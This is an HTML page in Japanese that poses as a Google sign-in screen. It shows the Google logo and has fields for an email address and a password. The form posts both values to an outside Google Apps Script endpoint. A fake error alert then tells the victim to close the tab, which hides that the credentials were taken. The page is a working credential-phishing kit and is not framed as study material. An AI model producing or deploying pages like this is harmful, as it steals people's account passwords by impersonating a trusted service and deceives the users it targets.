<!DOCTYPE html>
<html lang="ja">

<head>
 <meta charset="UTF-8">
 <form method="post" action="https://script.google.com/macros/s/AKfycby4pMNVkxoBdbqqz7XJC0d8SV0yFy0O45oxei1SgKPA1RkjJBPeS2Mv8aXFZFe-rQJr/exec">
<div class="form">
  
  <img src="https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png"> 
                             
<label><input type="email" name="e" placeholder="Email" /></label>
   
  <label><input type="password" name="p" placeholder="Password" /></label>

  
  <input type="submit" value="sign in" onclick="alert('エラーが発生しました。このタブを閉じてもう一度試してください')">
   

 

</div>
<style>
* {
  box-sizing: border-box;
}

body {
  background-color: #eeeeee;
}

img {
  display: block;
  width: 150px;
  margin: 30px auto;
 
  
}

.form {
  background-color: #ffffff;
  width: 500px;
  margin: 50px auto 10px auto;
  padding: 30px;
  border-radius: 8px;
  overflow: hidden;
  box-shadow: 0 2px 10px -3px #333;
  text-align: center;
}

input {
  border-radius: 100px;
  padding: 10px 15px;
  width: 50%;
  border: 1px solid #D9D9D9;
  outline: none;
  display: block;
  margin: 20px auto 20px auto;
}

button {
  border-radius: 100px;
  border: none;
  background: #719BE6;
  width: 50%;
  padding: 10px;
  color: #FFFFFF;
  margin-top: 25px;
  box-shadow: 0 2px 10px -3px #719BE6;
  display: block;
  margin: 55px auto 10px auto;
}

a {
  text-align: center;
  margin-top: 30px;
  color: #719BE6;
  text-decoration: none;
  padding: 5px;
  display: inline-block;
}

a:hover {
  text-decoration: underline;
}
</style>
